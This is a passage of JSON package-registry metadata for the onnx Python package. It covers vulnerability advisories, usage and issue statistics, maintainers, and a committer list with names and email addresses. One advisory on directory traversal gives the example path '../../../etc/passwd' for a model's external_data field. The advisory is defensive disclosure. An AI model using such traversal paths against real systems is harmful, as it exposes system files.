i","package_name":"onnx","versions":[{"first_patched_version":"1.16.0","vulnerable_version_range":"\u003c= 1.15.0"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13aGg4LWZqZ2MtcXA3M84AA5ep/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mZnhqLTU0N3gtNWo3Y84AAxM0","url":"https://github.com/advisories/GHSA-ffxj-547x-5j7c","title":"Directory Traversal in onnx","description":"Versions of the package onnx before 1.13.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory, for example \"../../../etc/passwd\"","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-01-26T21:30:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-25882","https://github.com/onnx/onnx/issues/3991","https://github.com/onnx/onnx/pull/4400","https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d","https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856","https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129","https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479","https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml","https://github.com/advisories/GHSA-ffxj-547x-5j7c"],"source_kind":"github","identifiers":["GHSA-ffxj-547x-5j7c","CVE-2022-25882"],"repository_url":"https://github.com/onnx/onnx","blast_radius":34.2807598276957,"created_at":"2023-01-27T02:02:55.176Z","updated_at":"2026-06-20T04:09:06.468Z","epss_percentage":0.01608,"epss_percentile":0.72755,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mZnhqLTU0N3gtNWo3Y84AAxM0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mZnhqLTU0N3gtNWo3Y84AAxM0","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.13.0","vulnerable_version_range":"\u003c 1.13.0"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mZnhqLTU0N3gtNWo3Y84AAxM0/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/onnx","docker_dependents_count":906,"docker_downloads_count":27151225,"usage_url":"https://repos.ecosyste.ms/usage/pypi/onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-28T16:54:51.429Z","issues_count":933,"pull_requests_count":834,"avg_time_to_close_issue":20454176.395948436,"avg_time_to_close_pull_request":7484056.472108844,"issues_closed_count":538,"pull_requests_closed_count":735,"pull_request_authors_count":122,"issue_authors_count":498,"avg_comments_per_issue":3.084673097534834,"avg_comments_per_pull_request":2.241007194244604,"merged_pull_requests_count":575,"bot_issues_count":0,"bot_pull_requests_count":149,"past_year_issues_count":336,"past_year_pull_requests_count":478,"past_year_avg_time_to_close_issue":1613074.5972222222,"past_year_avg_time_to_close_pull_request":604450.2235294117,"past_year_issues_closed_count":144,"past_year_pull_requests_closed_count":425,"past_year_pull_request_authors_count":55,"past_year_issue_authors_count":209,"past_year_avg_comments_per_issue":2.4642857142857144,"past_year_avg_comments_per_pull_request":2.215481171548117,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":114,"past_year_merged_pull_requests_count":355,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"jcwchen","count":45,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"zhenhuaw-me","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"linkerzhang","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"prasanthpul","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"houseroad","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"lutzroeder","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"}],"active_maintainers":[{"login":"andife","count":58,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"liqunfu","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"zhenhuaw-me","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"take-cheeze","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx/codemeta","maintainers":[{"uuid":"onnx","login":"onnx","name":null,"email":null,"url":null,"packages_count":4,"html_url":"https://pypi.org/user/onnx/","role":null,"created_at":"2022-12-13T02:05:58.574Z","updated_at":"2022-12-13T02:05:58.574Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/onnx/packages"},{"uuid":"justinchuby","login":"justinchuby","name":null,"email":null,"url":null,"packages_count":12,"html_url":"https://pypi.org/user/justinchuby/","role":"Owner","created_at":"2023-12-12T16:33:37.040Z","updated_at":"2023-12-12T16:33:37.040Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/justinchuby/packages"},{"uuid":"xadupre","login":"xadupre","name":null,"email":null,"url":null,"packages_count":5,"html_url":"https://pypi.org/user/xadupre/","role":"Owner","created_at":"2023-12-12T16:33:37.194Z","updated_at":"2023-12-12T16:33:37.194Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/xadupre/packages"},{"uuid":"cjvolzka","login":"cjvolzka","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://pypi.org/user/cjvolzka/","role":"Owner","created_at":"2024-08-20T00:26:35.862Z","updated_at":"2024-08-20T00:26:35.862Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/cjvolzka/packages"},{"uuid":"liqun_foo_at_gmail","login":"liqun_foo_at_gmail","name":null,"email":null,"url":null,"packages_count":2,"html_url":"https://pypi.org/user/liqun_foo_at_gmail/","role":"Owner","created_at":"2024-08-20T00:26:35.956Z","updated_at":"2024-08-20T00:26:35.956Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/liqun_foo_at_gmail/packages"},{"uuid":"ravibhuchara","login":"ravibhuchara","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://pypi.org/user/ravibhuchara/","role":"Owner","created_at":"2024-08-20T00:26:36.025Z","updated_at":"2024-08-20T00:26:36.025Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/ravibhuchara/packages"},{"uuid":"roborags","login":"roborags","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://pypi.org/user/roborags/","role":"Owner","created_at":"2024-08-20T00:26:36.110Z","updated_at":"2024-08-20T00:26:36.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/roborags/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":890698,"maintainers_count":381518,"namespaces_count":0,"keywords_count":289179,"github":"pypi","metadata":{"funded_packages_count":54301},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-06-10T05:13:28.296Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}}],"commits":{"id":6840,"full_name":"onnx/onnx","default_branch":"main","total_commits":3692,"total_committers":390,"total_bot_commits":357,"total_bot_committers":2,"mean_commits":9.466666666666667,"dds":0.9057421451787648,"past_year_total_commits":591,"past_year_total_committers":60,"past_year_total_bot_commits":127,"past_year_total_bot_committers":2,"past_year_mean_commits":9.85,"past_year_dds":0.7123519458544839,"last_synced_at":"2026-05-30T04:38:17.711Z","last_synced_commit":"b766fa6d7078dc407c7e8a5e24d699af35ab7c0d","created_at":"2023-03-07T09:43:48.994Z","updated_at":"2026-05-30T04:20:45.947Z","committers":[{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":348},{"name":"Andreas Fehlner","email":"fehlner@arcor.de","login":"andife","count":329},{"name":"Chun-Wei Chen","email":"jacky82226@gmail.com","login":"jcwchen","count":268},{"name":"Yuanyuan Chen","email":"cyyever@outlook.com","login":"cyyever","count":175},{"name":"bddppq","email":"bai@in.tum.de","login":"bddppq","count":174},{"name":"Justin Chu","email":"justinchuby","login":"justinchuby","count":162},{"name":"Lu Fang","email":"30275821+houseroad","login":"houseroad","count":149},{"name":"G. Ramalingam","email":"grama@microsoft.com","login":"gramalingam","count":140},{"name":"Ke Zhang","email":"kezhan@microsoft.com","login":"linkerzhang","count":102},{"name":"Xavier Dupré","email":"xadupre","login":"xadupre","count":92},{"name":"liqun Fu","email":"liqfu@microsoft.com","login":"liqunfu","count":62},{"name":"Prasanth Pulavarthi","email":"prasantp@microsoft.com","login":"prasanthpul","count":55},{"name":"Ashwini Khade","email":"askhade@microsoft.com","login":"askhade","count":48},{"name":"Yuan Yu","email":"yuanbyu@microsoft.com","login":"yuanbyu","count":45},{"name":"Sebastian Meßmer","email":"smessmer","login":"smessmer","count":42},{"name":"anderspapitto","email":"anderspapitto@gmail.com","login":"anderspapitto","count":40},{"name":"Christian Bourjau","email":"cbourjau","login":"cbourjau","count":39},{"name":"Edward Z. Yang","email":"ezyang@fb.com","login":"ezyang","count":35},{"name":"daquexian","email":"daquexian566@gmail.com","login":"daquexian","count":33},{"name":"Marat Dukhan","email":"maratek@gmail.com","login":"Maratyszcza","count":32},{"name":"Rui Zhu","email":"zrphercule@gmail.com","login":"zrphercule","count":32},{"name":"Wei-Sheng Chin","email":"wschin@outlook.com","login":"wschin","count":31},{"name":"Wenhao Hu","email":"fumihwh@gmail.com","login":"fumihwh","count":28},{"name":"Ti-Tai Wang","email":"titaiwang@microsoft.com","login":"titaiwangms","count":27},{"name":"Raymond Yang","email":"zihao.yang@microsoft.com","login":null,"count":27},{"name":"Yuan Yao","email":"99693700+yuanyao-nv","login":"yuanyao-nv","count":26},{"name":"Changming Sun","email":"chasun@microsoft.com","login":"snnn","count":26},{"name":"Takeshi Watanabe","email":"take-cheeze","login":"take-cheeze","count":25},{"name":"Negin Raoof","email":"neginmr@utexas.edu","login":"neginraoof","count":25},{"name":"Bowen Bao","email":"bowbao@microsoft.com","login":"BowenBao","count":22},{"name":"Copilot","email":"198982749+Copilot","login":"Copilot","count":21},{"name":"Gary Miguel","email":"garymiguel@microsoft.com","login":"garymm","count":21},{"name":"Yinghai Lu","email":"yinghai@fb.com","login":null,"count":20},{"name":"James Reed","email":"jamesreed@fb.com","login":null,"count":20},{"name":"Dmitri Smirnov","email":"yuslepukhin","login":"yuslepukhin","count":19},{"name":"Emad Barsoum","email":"ebarsoum@gmail.com","login":"ebarsoum","count":19},{"name":"Hariharan Seshadri","email":"shariharan91@gmail.com","login":"hariharans29","count":19},{"name":"Marcelo Lopez Ruiz","email":"mruiz@microsoft.com","login":"marcelolr","count":19},{"name":"Scott McKay","email":"Scott.McKay@microsoft.com","login":"skottmckay","count":18},{"name":"Don Box","email":"dbox@microsoft.com","login":null,"count":15},{"name":"Dmytro Dzhulgakov","email":"dzhulgakov","login":"dzhulgakov","count":15},{"name":"Charles Volzka","email":"42243335+cjvolzka","login":"cjvolzka","count":14},{"name":"M. Zeeshan Siddiqui","email":"mzs@microsoft.com","login":"codemzs","count":14},{"name":"Shinichiro Hamaji","email":"shinichiro.hamaji@gmail.com","login":"shinh","count":14},{"name":"Joaquin Anton","email":"janton@nvidia.com","login":"jantonguirao","count":14},{"name":"Don Box","email":"dbox@xbox.com","login":"donbox","count":14},{"name":"Akshay Chalana","email":"ac2zoom@yahoo.com","login":"Ac2zoom","count":13},{"name":"Vinitra Swamy","email":"vinitras@gmail.com","login":"vinitra","count":12},{"name":"Aditya Goel","email":"48102515+adityagoel4512","login":"adityagoel4512","count":11},{"name":"Spandan Tiwari","email":"spandantiwari@gmail.com","login":"spandantiwari","count":11},{"name":"Po-Chu Hsu","email":"tonypottera@gmail.com","login":"tonypottera24","count":10},{"name":"Tianlei Wu","email":"tlwu@microsoft.com","login":"tianleiwu","count":10},{"name":"Jakub Bachurski","email":"kbachurski@gmail.com","login":"jbachurski","count":9},{"name":"Peyman Manikashani","email":"34145780+pk-g","login":"pk-g","count":9},{"name":"renovate[bot]","email":"29139614+renovate[bot]","login":"renovate[bot]","count":9},{"name":"Matteo Salvarezza","email":"matteo.salvarezza@gmail.com","login":"matteosal","count":9},{"name":"Joseph Spisak","email":"spisakjo@gmail.com","login":"jspisak","count":9},{"name":"Sarah Bird","email":"slbird@fb.com","login":null,"count":9},{"name":"Dmytro Dzhulgakov","email":"dzhulgakov@fb.com","login":null,"count":9},{"name":"Joe","email":"joe@preferred.jp","login":"xuzijian629","count":9},{"name":"Michał Karzyński","email":"postrational","login":"postrational","count":9},{"name":"Danni","email":"leedanni@gmail.com","login":"isdanni","count":9},{"name":"Armen","email":"armen.ag@live.com","login":"ArmenAg","count":8},{"name":"Dwayne Robinson","email":"dwayner@microsoft.com","login":"fdwr","count":8},{"name":"Shubham Bhokare","email":"32080845+shubhambhokare1","login":"shubhambhokare1","count":8},{"name":"Pranav Sharma","email":"emailpranav@gmail.com","login":"pranavsharma","count":8},{"name":"Gal Hubara-Agam","email":"ghubaraagam@nvidia.com","login":"galagam","count":7},{"name":"rwilliams58","email":"33673692+rwilliams58","login":"rwilliams58","count":7},{"name":"konstantin-pueckler-qc","email":"konstantin.pueckler@quantco.com","login":"konstantin-pueckler-qc","count":7},{"name":"Yuhong Guo","email":"guoyuhong85@126.com","login":"guoyuhong","count":7},{"name":"Tian Jin","email":"tjingrant@gmail.com","login":"tjingrant","count":7},{"name":"Sherlock","email":"SherlockNoMad","login":"SherlockNoMad","count":7},{"name":"Ksenija Stanojevic","email":"KsenijaS","login":"KsenijaS","count":7},{"name":"Ewa Tusień","email":"ewa.tusien@intel.com","login":null,"count":7},{"name":"Lara Haidar","email":"haidar.lara@gmail.com","login":"lara-hdr","count":7},{"name":"Przemyslaw Wysocki","email":"przemyslaw.wysocki@intel.com","login":"p-wysocki","count":6},{"name":"Ilya Lavrenov","email":"ilya.lavrenov@intel.com","login":"ilya-lavrenov","count":6},{"name":"Hector Li","email":"hecli@microsoft.com","login":"HectorSVC","count":6},{"name":"Chin Huang","email":"chhuang@us.ibm.com","login":"chinhuang007","count":6},{"name":"Sergii Dymchenko","email":"kit1980@gmail.com","login":"kit1980","count":6},{"name":"Anirudh","email":"anirudhkrec@gmail.com","login":"anirudhacharya","count":6},{"name":"Zhenhua Wang","email":"4936589+zhenhuaw-me","login":"zhenhuaw-me","count":5},{"name":"Lutz Roeder","email":"lutzroeder","login":"lutzroeder","count":5},{"name":"Jonny Shipton","email":"jonny@myrtlesoftware.com","login":"TMVector","count":5},{"name":"Jeff Saremi","email":"jeffsaremi@hotmail.com","login":"jeffsaremi","count":5},{"name":"James Allingham","email":"james.allingham@gmail.com","login":"JamesAllingham","count":5},{"name":"Nat Kershaw (MSFT)","email":"nakersha@microsoft.com","login":"natke","count":5},{"name":"Sunny Anand","email":"164108690+Sunny-Anand","login":"Sunny-Anand","count":5},{"name":"Alexandre Eichenberger","email":"alexe@us.ibm.com","login":"AlexandreEichenberger","count":5},{"name":"TR-3B","email":"144127816+MagellaX","login":"MagellaX","count":5},{"name":"","email":"ramali@GRAMA-LT1.fareast.corp.microsoft.com","login":null,"count":4},{"name":"Brett Koonce","email":"koonce@hello.com","login":"brettkoonce","count":4},{"name":"Mark Hamilton","email":"mhamilton723@gmail.com","login":"mhamilton723","count":4},{"name":"oPluss","email":"opluss@qq.com","login":"OYCN","count":4},{"name":"Kevin Chen","email":"45886021+kevinch-nv","login":"kevinch-nv","count":4},{"name":"Jaliya Ekanayake","email":"jaliyaek@microsoft.com","login":"jaliyae","count":4},{"name":"Eric S. Yu","email":"ffk0716@gmail.com","login":"ffk0716","count":4},{"name":"Clif Houck","email":"me@clifhouck.com","login":"ClifHouck","count":4},{"name":"Atanas Dimitrov","email":"70822030+neNasko1","login":"neNasko1","count":4},{"name":"Matthieu Darbois","email":"mayeut","login":"mayeut","count":4},{"name":"Niklas Gustafsson","email":"niklasg@microsoft.com","login":"NiklasGustafsson","count":4},{"name":"Raghavan Naresh Sarangapani","email":"roborags80@gmail.com","login":"roborags","count":4},{"name":"Ryan Hill","email":"38674843+RyanUnderhill","login":"RyanUnderhill","count":4},{"name":"Sheil Kumar","email":"smk2007@gmail.com","login":"smk2007","count":4},{"name":"ideal","email":"40137309+slowlyideal","login":"slowlyideal","count":4},{"name":"TomWildenhain-Microsoft","email":"67606533+TomWildenhain-Microsoft","login":"TomWildenhain-Microsoft","count":4},{"name":"Varun Jain","email":"jainv@college.harvard.edu","login":"varunjain99","count":4},{"name":"Anna","email":"antheaj@vmware.com","login":null,"count":4},{"name":"prcvih","email":"41447049+autoih","login":"autoih","count":4},{"name":"Adrian Lizarraga","email":"adlizarraga@microsoft.com","login":"adrianlizarraga","count":3},{"name":"Ian Bearman","email":"ianb@microsoft.com","login":"manbearian","count":3},{"name":"Brennan Ravenscroft","email":"Bward7864@gmail.com","login":"Shadows-of-Fire","count":3},{"name":"Degao Chu","email":"degaochu@cn.ibm.com","login":"chudegao","count":3},{"name":"rajeevnalawadi","email":"rajeev.k.nalawadi@intel.com","login":"rajeevnalawadi","count":3},{"name":"marload","email":"rladhkstn8@gmail.com","login":"marload","count":3},{"name":"hlu1","email":"14827759+hlu1","login":"hlu1","count":3},{"name":"Teodora Sechkova","email":"tsechkova@vmware.com","login":"sechkova","count":3},{"name":"Tang, Cheng","email":"souptc@gmail.com","login":"souptc","count":3},{"name":"Robert Knight","email":"robertknight@gmail.com","login":"robertknight","count":3},{"name":"Rajeev Rao","email":"rajeevsrao","login":"rajeevsrao","count":3},{"name":"Jeff","email":"38966965+jeffbloo","login":"jeffbloo","count":3},{"name":"Jeremy Cochoy","email":"jeremy.cochoy@gmail.com","login":"jeremycochoy","count":3},{"name":"Mike Essenmacher","email":"112431871+mikeessen","login":"mikeessen","count":3},{"name":"Philip Lassen","email":"philiplassen+git@gmail.com","login":"philass","count":3},{"name":"Plinio Silveira","email":"plinio89s@gmail.com","login":"pliniosilveira","count":3},{"name":"Roman Dzhabarov","email":"34466929+rdzhabarov","login":"rdzhabarov","count":3},{"name":"Yulong Wang","email":"7679871+fs-eire","login":"fs-eire","count":3},{"name":"ashbhandare","email":"aibhanda@microsoft.com","login":"ashbhandare","count":3},{"name":"jignparm","email":"jignparm@microsoft.com","login":"jignparm","count":2},{"name":"hamptonm1","email":"79232909+hamptonm1","login":"hamptonm1","count":2},{"name":"Zachary Woods","email":"143150513+mrgyatso","login":"mrgyatso","count":2},{"name":"co63oc","email":"co63oc","login":"co63oc","count":2},{"name":"Kyle Sayers","email":"kylesayrs@gmail.com","login":"kylesayrs","count":2},{"name":"Joshua Rothe","email":"joshrothe@gmail.com","login":"rothej","count":2},{"name":"Li-Wen Chang","email":"30609447+liwchang","login":"liwchang","count":2},{"name":"Deyu Huang","email":"dejack953@outlook.com","login":"hwangdeyu","count":2},{"name":"Michał Górny","email":"mgorny@gentoo.org","login":"mgorny","count":2},{"name":"Patrice Vignola","email":"vignola.patrice@gmail.com","login":"PatriceVignola","count":2},{"name":"Pranav Prakash","email":"pranav-prakash","login":"pranav-prakash","count":2},{"name":"Edward Chen","email":"18449977+edgchen1","login":"edgchen1","count":2},{"name":"Pratishtha Singh","email":"182654574+Pratishtha5","login":"Pratishtha5","count":2},{"name":"Ramakrishnan Sivakumar","email":"ramkrishna2910@gmail.com","login":"ramkrishna2910","count":2},{"name":"RandySheriffH","email":"48490400+RandySheriffH","login":"RandySheriffH","count":2},{"name":"karljang","email":"karljang@gmail.com","login":"karljang","count":2},{"name":"one-hello","email":"39261981+one-hello","login":"one-hello","count":2},{"name":"pengwa","email":"pengwa@microsoft.com","login":"pengwa","count":2},{"name":"peterjc123","email":"peter_jiachen@163.com","login":"peterjc123","count":2},{"name":"sqhao","email":"haoshengqiang79@163.com","login":"HSQ79815","count":2},{"name":"stevenlix","email":"38092805+stevenlix","login":"stevenlix","count":2},{"name":"vloncar","email":"vloncar","login":"vloncar","count":2},{"name":"Jerry Zhang","email":"jerryzh@fb.com","login":"jerryzh168","count":2},{"name":"Sheng Zha","email":"szha","login":"szha","count":2},{"name":"Stefan Liebler","email":"stli@linux.ibm.com","login":"stliibm","count":2},{"name":"Svetlana Levitan","email":"40000019+sveta-levitan","login":"sveta-levitan","count":2},{"name":"TDYa127","email":"a127a127@gmail.com","login":"a127a127","count":2},{"name":"Tommaso Adani","email":"83273681+tadani3","login":"tadani3","count":2},{"name":"Yi Zhang","email":"zhanyi@microsoft.com","login":"mszhanyi","count":2},{"name":"Yosshi999","email":"Yosshi999","login":"Yosshi999","count":2},{"name":"Yufeng Li","email":"liyufeng1987@gmail.com","login":"yufenglee","count":2},{"name":"Tee Jung","email":"tee.jung@unfix.net","login":"Tee0125","count":2},{"name":"Thiago Crepaldi","email":"thiagofc@microsoft.com","login":null,"count":2},{"name":"Ryan Loney","email":"ryan.loney@intel.com","login":null,"count":2},{"name":"xkszltl","email":"xkszltl@gmail.com","login":"xkszltl","count":2},{"name":"Lee Yongjun","email":"35302114+elwhyjay","login":"elwhyjay","count":2},{"name":"Guoyu Wang","email":"62914304+gwang-msft","login":"gwang-msft","count":2},{"name":"Guoliang Hua","email":"32868157+nbcsm","login":"nbcsm","count":2},{"name":"Gao, Xiang","email":"qasdfgtyuiop@gmail.com","login":"zasdfgbnm","count":2},{"name":"Emmanuel Ferdman","email":"emmanuelferdman@gmail.com","login":"emmanuel-ferdman","count":2},{"name":"Dougal J. Sutherland","email":"dougal@gmail.com","login":"djsutherland","count":2},{"name":"David Fan","email":"30608893+jiafatom","login":"jiafatom","count":2},{"name":"Chessing234","email":"134995372+Chessing234","login":"Chessing234","count":2},{"name":"AtanasDimitrovQC","email":"128688806+AtanasDimitrovQC","login":"AtanasDimitrovQC","count":2},{"name":"Ashay Rane","email":"ashay","login":"ashay","count":2},{"name":"Armen Gabrielyan","email":"armengabrielyan16@gmail.com","login":"armgabrielyan","count":2},{"name":"Anand Krishna","email":"51157561+AnandKri","login":"AnandKri","count":2},{"name":"yancong","email":"32220263+ice-tong","login":"ice-tong","count":2},{"name":"Scott Cyphers","email":"cyphers@lightmatter.co","login":"diyessi","count":2},{"name":"Yuhong Guo","email":"yuhguo@microsoft.com","login":null,"count":1},{"name":"ZINEKS","email":"wutiantong@icloud.com","login":null,"count":1},{"name":"andreh","email":"andreh@localhost","login":null,"count":1},{"name":"tix.lo","email":"tix.lo@mediatek.com","login":null,"count":1},{"name":"王振华 (Zhenhua WANG)","email":"zhenhua.wzh@icloud.com","login":null,"count":1},{"name":"Casey Carter","email":"cartec69@gmail.com","login":"CaseyCarter","count":1},{"name":"Aman K. Shihab","email":"70906662+amankshihab","login":"amankshihab","count":1},{"name":"Alexander Yermolovich","email":"43973793+ayermolo","login":"ayermolo","count":1},{"name":"Alexander Kvitkevich","email":"100673758+alexkvitkevich","login":"alexkvitkevich","count":1},{"name":"Alexander Grund","email":"Flamefire","login":"Flamefire","count":1},{"name":"Tomasz Dołbniak","email":"tomasz.dolbniak@intel.com","login":null,"count":1},{"name":"Tingfan Wu","email":"tingfan.wu@umbocv.com","login":null,"count":1},{"name":"Thiago Crepaldi","email":"thiago.crepaldi@microsoft.com","login":null,"count":1},{"name":"Spandan Tiwari","email":"sptiwari@microsoft.com","login":null,"count":1},{"name":"Oleg Poyaganov","email":"opedge@gmail.com","login":null,"count":1},{"name":"Marek Kolodziej","email":"mkolodziej@nvidia.com","login":null,"count":1},{"name":"Marat Dukhan","email":"marat@fb.com","login":null,"count":1},{"name":"KeDengMS","email":"kedeng@microsoft.com","login":null,"count":1},{"name":"Jicheng Tang","email":"tangjicheng@sogou-inc.com","login":null,"count":1},{"name":"Dmitry Levin","email":"dmitry@prisma-ai.com","login":null,"count":1},{"name":"Trevor Gamblin","email":"tgamblin@ecocode.ca","login":"threexc","count":1},{"name":"Valentin Churavy","email":"vchuravy","login":"vchuravy","count":1},{"name":"Vedant Madane","email":"6527493+VedantMadane","login":"VedantMadane","count":1},{"name":"Verma-Rajat","email":"46986892+Verma-Rajat","login":"Verma-Rajat","count":1},{"name":"WORLD PEACE","email":"captainlin205@gmail.com","login":"captainIT","count":1},{"name":"Wanchao","email":"wanchaol","login":"wanchaol","count":1},{"name":"Weon Yuan","email":"wwyuan@us.ibm.com","login":"weonyuan","count":1},{"name":"mshudrak","email":"69989229+mshudrak","login":"mshudrak","count":1},{"name":"XavierAtShanghai","email":"xfwang0219@163.com","login":"XavierAtShanghai","count":1},{"name":"Xiao Ke-Ting","email":"peter.xiau@gmail.com","login":"yocox","count":1},{"name":"Xingyu Xie","email":"namasikanam@gmail.com","login":"namasikanam","count":1},{"name":"Yadunand Kamath","email":"yadunand.kamath@gmail.com","login":"yadunand-kamath","count":1},{"name":"Yangqing Jia","email":"jiayq84@gmail.com","login":"Yangqing","count":1},{"name":"Yaoyao Ding","email":"dingyaoyao.cs@gmail.com","login":"yaoyaoding","count":1},{"name":"Ye Wang","email":"52801275+wangyems","login":"wangyems","count":1},{"name":"Yesha-Thakkar","email":"107151773+Yesha-Thakkar","login":"Yesha-Thakkar","count":1},{"name":"Yi-Hong Lyu","email":"lyh.kernel@gmail.com","login":"yihonglyu","count":1},{"name":"Yifei Teng","email":"tengyifei","login":"tengyifei","count":1},{"name":"Yinghai Lu","email":"yinghai","login":"yinghai","count":1},{"name":"Yongxin Wang","email":"fefe.wyx@gmail.com","login":"fefe982","count":1},{"name":"Yorkie Liu","email":"yorkiefixer@gmail.com","login":"yorkie","count":1},{"name":"Young Kim","email":"youngseongkim93@gmail.com","login":"yskim1501","count":1},{"name":"Yuta Okamoto","email":"okapies@gmail.com","login":"okapies","count":1},{"name":"Yuxin Wu","email":"ppwwyyxxc@gmail.com","login":"ppwwyyxx","count":1},{"name":"Pete Warden","email":"pete@petewarden.com","login":"petewarden","count":1},{"name":"Prabhat","email":"prabhatr@usc.edu","login":"prabhat00155","count":1},{"name":"Pranshu Pant","email":"32600304+pranshupant","login":"pranshupant","count":1},{"name":"RAGHUL M","email":"ragm@redhat.com","login":"Raghul-M","count":1},{"name":"Rail","email":"chabdarov.r.a@yandex.ru","login":"Exile333","count":1},{"name":"Rajan Singh","email":"33766898+spidyDev","login":"spidyDev","count":1},{"name":"Randy","email":"45701928+RandyShuai","login":"RandyShuai","count":1},{"name":"Raymond Yang","email":"30183166+raymondxyang","login":"raymondxyang","count":1},{"name":"Rob Earhart","email":"earhart@gmail.com","login":"earhart","count":1},{"name":"RoboSchmied","email":"github@roboschmie.de","login":"RoboSchmied","count":1},{"name":"Rudro","email":"rudro1152@gmail.com","login":"rudrOwO","count":1},{"name":"Ryota Tomioka","email":"ryoto@microsoft.com","login":"ryotatomioka","count":1},{"name":"Sam Pepose","email":"sampepose@gmail.com","login":"sampepose","count":1},{"name":"Senja Filipi","email":"sfilipi","login":"sfilipi","count":1},{"name":"Sergey","email":"adeykin90@gmail.com","login":"Adeykin","count":1},{"name":"ShayHacohen","email":"44909655+ShayHacohen","login":"ShayHacohen","count":1},{"name":"Shuangchi He","email":"34329208+Yulv-git","login":"Yulv-git","count":1},{"name":"Simon Byrne","email":"simonbyrne@gmail.com","login":"simonbyrne","count":1},{"name":"SpaceIm","email":"30052553+SpaceIm","login":"SpaceIm","count":1},{"name":"Stephen 